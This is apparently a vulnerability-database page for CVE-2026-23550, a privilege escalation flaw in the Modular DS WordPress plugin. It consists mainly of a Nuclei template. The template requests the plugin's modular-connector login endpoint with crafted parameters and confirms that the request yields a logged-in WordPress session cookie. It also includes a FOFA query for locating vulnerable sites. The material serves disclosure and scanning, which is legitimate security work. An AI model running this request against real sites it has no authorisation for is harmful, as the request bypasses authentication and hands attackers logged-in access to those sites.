CVE-2026-23550: Modular DS - Broken Access Control

2026-01-24 Modular DS PoC Public

Description

Modular DS = 2.5.1 contains a broken access control vulnerability caused by incorrect privilege assignment, letting attackers escalate their privileges, exploit requires no special conditions.

PoC

id: CVE-2026-23550

info:
  name: Modular DS - Broken Access Control
  author: DhiyaneshDk,l46983284-cpu
  severity: high
  description: |
    Modular DS = 2.5.1 contains a broken access control vulnerability caused by incorrect privilege assignment, letting attackers escalate their privileges, exploit requires no special conditions.
  impact: |
    Attackers can escalate their privileges, potentially gaining unauthorized access to sensitive functions or data.
  remediation: |
    Update to the latest version beyond 2.5.1.
  reference:
    - https://help.modulards.com/en/article/modular-ds-security-release-modular-connector-252-dm3mv0/
    - https://patchstack.com/database/wordpress/plugin/modular-connector/vulnerability/wordpress-modular-ds-monitor-update-and-backup-multiple-websites-plugin-2-5-1-privilege-escalation-vulnerability
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="/plugins/modular-connector/"
  tags: cve,cve2026,wordpress,wp-plugin,wp,auth-bypass,modular-connector,vkev,vuln

variables:
  string: "{{to_lower(rand_text_alpha(5))}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php/api/modular-connector/login/{{string}}/?origin=mo&type=foo"
      - "{{BaseURL}}/api/modular-connector/login/{{string}}/?origin=mo&type=foo"

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, "wordpress_logged_in")
        condition: and
# digest: 4b0a00483046022100e84a3c55e9f481189634fa937ebee30d23a5c7295453b4703ce81eaba422f6e4022100a79558eadad3453b78b81c884c403e1d467f366e9fe77d8503624f9a4772fd42:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities